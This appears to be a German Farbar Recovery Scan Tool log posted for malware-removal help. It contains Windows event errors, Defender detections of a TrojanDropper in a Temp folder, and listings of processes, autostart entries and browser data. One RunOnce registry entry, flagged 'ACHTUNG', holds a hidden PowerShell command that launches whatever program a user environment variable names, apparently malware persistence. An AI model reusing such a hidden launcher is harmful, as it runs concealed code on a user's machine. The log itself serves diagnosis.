Startzeit: 01d6df7570957287

Beendigungszeit: 24

Anwendungspfad: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Bericht-ID: 8d968dff-4197-40a0-80a9-beb335dfef47

Vollständiger Name des fehlerhaften Pakets: 

Relative Anwendungs-ID des fehlerhaften Pakets: 

Absturztyp: Cross-process

Error: (12/15/2020 10:07:01 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm Microsoft.Photos.exe Version 2020.20110.11001.0 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 2ddc

Startzeit: 01d6d2c180af7335

Beendigungszeit: 4294967295

Anwendungspfad: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe

Bericht-ID: 5a8a5bfd-4e3d-4dc8-a2d5-ef7069012949

Vollständiger Name des fehlerhaften Pakets: Microsoft.Windows.Photos_2020.20110.11001.0_x64__8wekyb3d8bbwe

Relative Anwendungs-ID des fehlerhaften Pakets: App

Absturztyp: Cross-process

Error: (12/15/2020 10:06:58 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 28f4

Startzeit: 01d6d2c07cb57be1

Beendigungszeit: 0

Anwendungspfad: C:\Windows\explorer.exe

Bericht-ID: c526209e-141b-49b4-a607-71cf75713d4a

Vollständiger Name des fehlerhaften Pakets: 

Relative Anwendungs-ID des fehlerhaften Pakets: 

Absturztyp: Cross-process

Error: (12/15/2020 09:58:42 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 2608

Startzeit: 01d6d2b1bd864c9b

Beendigungszeit: 0

Anwendungspfad: C:\Windows\explorer.exe

Bericht-ID: b520483e-c602-45e2-8fe9-15a88b5d0f17

Vollständiger Name des fehlerhaften Pakets: 

Relative Anwendungs-ID des fehlerhaften Pakets: 

Absturztyp: Unknown

Error: (12/10/2020 08:09:56 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0


Systemfehler:
=============
Error: (01/09/2021 03:46:20 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)
Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXjytc7c0yvwb8n3cw0r82k4364sd1s7bv.mca als Nicht verfügbar/Nicht verfügbar. Fehler:
"2147958031"
Aufgetreten beim Start dieses Befehls:
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca

Error: (01/09/2021 03:37:12 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)
Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:
"2147958031"
Aufgetreten beim Start dieses Befehls:
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca

Error: (01/09/2021 03:36:42 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)
Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:
"2147958031"
Aufgetreten beim Start dieses Befehls:
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca

Error: (01/09/2021 03:36:12 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)
Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:
"2147958031"
Aufgetreten beim Start dieses Befehls:
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca

Error: (01/09/2021 03:30:31 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)
Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppX6jbm6fjqte5wzzrf5807m7eq0z44q5gf.mca als Nicht verfügbar/Nicht verfügbar. Fehler:
"2147958031"
Aufgetreten beim Start dieses Befehls:
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca

Error: (01/09/2021 03:30:31 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)
Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:
"2147958031"
Aufgetreten beim Start dieses Befehls:
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca

Error: (01/09/2021 03:28:17 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)
Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:
"2147958031"
Aufgetreten beim Start dieses Befehls:
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca

Error: (01/09/2021 03:27:48 PM) (Source: DCOM) (EventID: 10001) (User: PC5-L)
Description: Ein DCOM-Server konnte nicht gestartet werden: Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy!CortanaUI.AppXynb3eakad12451rv00qxextfnce9sxb8.mca als Nicht verfügbar/Nicht verfügbar. Fehler:
"2147958031"
Aufgetreten beim Start dieses Befehls:
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca


Windows Defender:
===================================
Date: 2021-01-09 15:47:12.9890000Z
Description: 
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: PC5-L\buskr5
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.329.1924.0, AS: 1.329.1924.0, NIS: 1.329.1924.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-09 15:27:32.2830000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {CD392251-82AD-4230-8B1B-02F5DAAE2DF1}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2021-01-09 15:00:56.0110000Z
Description: 
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: PC5-L\buskr5
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.329.1821.0, AS: 1.329.1821.0, NIS: 1.329.1821.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-07 19:07:31.1610000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {F826CD36-B17A-4994-843F-547ED9BF91B1}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Vollständige Überprüfung
Benutzer: PC5-L\buskr5

Date: 2021-01-07 19:00:40.2340000Z
Description: 
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=App:Chip_Updater_BundleInstaller&threatid=268628&enterprise=0
Name: App:Chip_Updater_BundleInstaller
ID: 268628
Schweregrad: Niedrig
Kategorie: Potenziell unerwünschte Software
Pfad: file:_C:\Users\buskr5\Downloads\Photo Lab - CHIP-Installer.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: PC5-L\buskr5
Prozessname: C:\Windows\explorer.exe
Sicherheitsversion: AV: 1.329.1821.0, AS: 1.329.1821.0, NIS: 1.329.1821.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

CodeIntegrity:
===================================

Date: 2021-01-09 18:05:56.7880000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

Date: 2021-01-09 18:05:56.7830000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

Date: 2021-01-09 18:05:56.5360000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

Date: 2021-01-09 18:05:56.5330000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

Date: 2021-01-09 17:51:30.9740000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2021-01-09 17:51:30.9690000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2021-01-09 17:50:56.2490000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

Date: 2021-01-09 17:50:56.2430000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Windows signing level requirements.

==================== Speicherinformationen =========================== 

BIOS: FUJITSU // Insyde Software Corp. Version 2.05 06/25/2019
Hauptplatine: FUJITSU FJNBB5C
Prozessor: Intel(R) Core(TM) i3-6006U CPU @ 2.00GHz
Prozentuale Nutzung des RAM: 47%
Installierter physikalischer RAM: 8088.56 MB
Verfügbarer physikalischer RAM: 4282.3 MB
Summe virtueller Speicher: 9368.56 MB
Verfügbarer virtueller Speicher: 5182.09 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.32 GB) (Free:165.13 GB) NTFS

\\?\Volume{d4bd63c3-9f0a-44ee-af4e-35806701b471}\ () (Fixed) (Total:0.49 GB) (Free:0.47 GB) NTFS
\\?\Volume{60a0e813-3eea-47c5-87e8-d6c29f22d114}\ () (Fixed) (Total:0.55 GB) (Free:0.08 GB) NTFS
\\?\Volume{ff4dfa97-53c2-4020-9f39-7bdc41872594}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partitionstabelle ====================

==================== Ende von Addition.txt =======================
         
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-01-2021
durchgeführt von buskr5 (ACHTUNG: der Benutzer ist kein Administrator) auf PC5-L (FUJITSU LIFEBOOK A357) (09-01-2021 18:10:56)
Gestartet von C:\Users\buskr5\Downloads
Geladene Profile: buskr5
Platform: Windows 10 Pro Version 20H2 19042.685 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: Chrome
Start-Modus: Normal

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(ALPS ELECTRIC CO., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\hidfind.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(DATEV eG 08 2 -> DATEV eG) C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHost.exe
(DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.) C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <23>
(Hewlett Packard -> HP Inc.) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxEM.exe
(Learnpulse -> Learnpulse) C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\Screenpresso.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
konnte nicht auf den Prozess zugreifen -> AppleMobileDeviceService.exe
konnte nicht auf den Prozess zugreifen -> armsvc.exe
konnte nicht auf den Prozess zugreifen -> conhost.exe
konnte nicht auf den Prozess zugreifen -> csrss.exe
konnte nicht auf den Prozess zugreifen -> csrss.exe
konnte nicht auf den Prozess zugreifen -> dasHost.exe
konnte nicht auf den Prozess zugreifen -> dllhost.exe
konnte nicht auf den Prozess zugreifen -> dwm.exe
konnte nicht auf den Prozess zugreifen -> fontdrvhost.exe
konnte nicht auf den Prozess zugreifen -> fontdrvhost.exe
konnte nicht auf den Prozess zugreifen -> fuj02e3-utility.exe
konnte nicht auf den Prozess zugreifen -> HidMonitorSvc.exe
konnte nicht auf den Prozess zugreifen -> ibtsiva.exe
konnte nicht auf den Prozess zugreifen -> igfxCUIService.exe
konnte nicht auf den Prozess zugreifen -> iked.exe
konnte nicht auf den Prozess zugreifen -> IntelCpHDCPSvc.exe
konnte nicht auf den Prozess zugreifen -> IntelCpHeciSvc.exe
konnte nicht auf den Prozess zugreifen -> iPodService.exe
konnte nicht auf den Prozess zugreifen -> ipsecd.exe
konnte nicht auf den Prozess zugreifen -> jhi_service.exe
konnte nicht auf den Prozess zugreifen -> LMS.exe
konnte nicht auf den Prozess zugreifen -> lsass.exe
konnte nicht auf den Prozess zugreifen -> mDNSResponder.exe
konnte nicht auf den Prozess zugreifen -> MsMpEng.exe
konnte nicht auf den Prozess zugreifen -> NisSrv.exe
konnte nicht auf den Prozess zugreifen -> OfficeClickToRun.exe
konnte nicht auf den Prozess zugreifen -> SearchFilterHost.exe
konnte nicht auf den Prozess zugreifen -> SearchIndexer.exe
konnte nicht auf den Prozess zugreifen -> SearchProtocolHost.exe
konnte nicht auf den Prozess zugreifen -> SecurityHealthService.exe
konnte nicht auf den Prozess zugreifen -> services.exe
konnte nicht auf den Prozess zugreifen -> SgrmBroker.exe
konnte nicht auf den Prozess zugreifen -> SiPaHostService.exe
konnte nicht auf den Prozess zugreifen -> smss.exe
konnte nicht auf den Prozess zugreifen -> spoolsv.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> svchost.exe
konnte nicht auf den Prozess zugreifen -> TeamViewer_Service.exe
konnte nicht auf den Prozess zugreifen -> wininit.exe
konnte nicht auf den Prozess zugreifen -> winlogon.exe
konnte nicht auf den Prozess zugreifen -> wlanext.exe
konnte nicht auf den Prozess zugreifen -> WmiPrvSE.exe
konnte nicht auf den Prozess zugreifen -> WUDFHost.exe
konnte nicht auf den Prozess zugreifen -> WUDFHost.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18391120 2019-12-11] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [DisplayLinkTrayApp] => C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe [2221888 2018-11-21] (DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [331064 2020-07-24] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [DVCServ] => C:\Program Files (x86)\DATEV\PROGRAMM\SipaCompact\SiPaHost.exe [1094160 2020-10-20] (DATEV eG 08 2 -> DATEV eG)
HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Run: [Screenpresso] => C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\Screenpresso.exe [18398304 2021-01-09] (Learnpulse -> Learnpulse)
HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Run: [HP OfficeJet Pro 7740 (NET)] => C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe [3770504 2018-04-06] (Hewlett Packard -> HP Inc.)
HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\RunOnce: [buskr5] => powershell -Win Hi -Command "$r = [Environment]::GetEnvironmentVariable('buskr5', 'User').split();$p=$r[0];$r[0]='';Start-Process $p -ArgumentList ($r -join ' ') -Win Hi" <==== ACHTUNG
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
Startup: C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Laufwerke.bat [2019-01-27] () [Datei ist nicht signiert]

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{379cb8d3-10a1-4062-b840-8afb6c84784b}: [DhcpNameServer] 192.168.10.1
Tcpip\..\Interfaces\{4cec849f-a057-45bf-a346-ef6290670ce0}: [NameServer] 192.168.10.1
Tcpip\..\Interfaces\{8d46b3e8-e3e4-4d57-9ac0-d4bf3d80561a}: [DhcpNameServer] 192.168.1.250
Tcpip\..\Interfaces\{d94cdd1b-4d3b-485d-8a86-23879c01e60c}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{fb4f79cc-731d-4165-b863-585f13ab9b6f}: [DhcpNameServer] 192.168.178.1

Edge: 
======
DownloadDir: C:\Users\buskr5\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\buskr5\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-07]
Edge DownloadDir: C:\Users\buskr5\Downloads
Edge StartupUrls: Default -> "hxxp://google.de/"

FireFox:
========
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)

Chrome: 
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default [2021-01-09]
CHR Extension: (Adblock Plus - kostenloser Adblocker) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2020-12-15]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (Chrome Media Router) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-08]
CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-07]
CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1 [2021-01-07]
CHR Extension: (Präsentationen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-11-09]
CHR Extension: (Docs) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2020-11-09]
CHR Extension: (Google Drive) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-11-09]
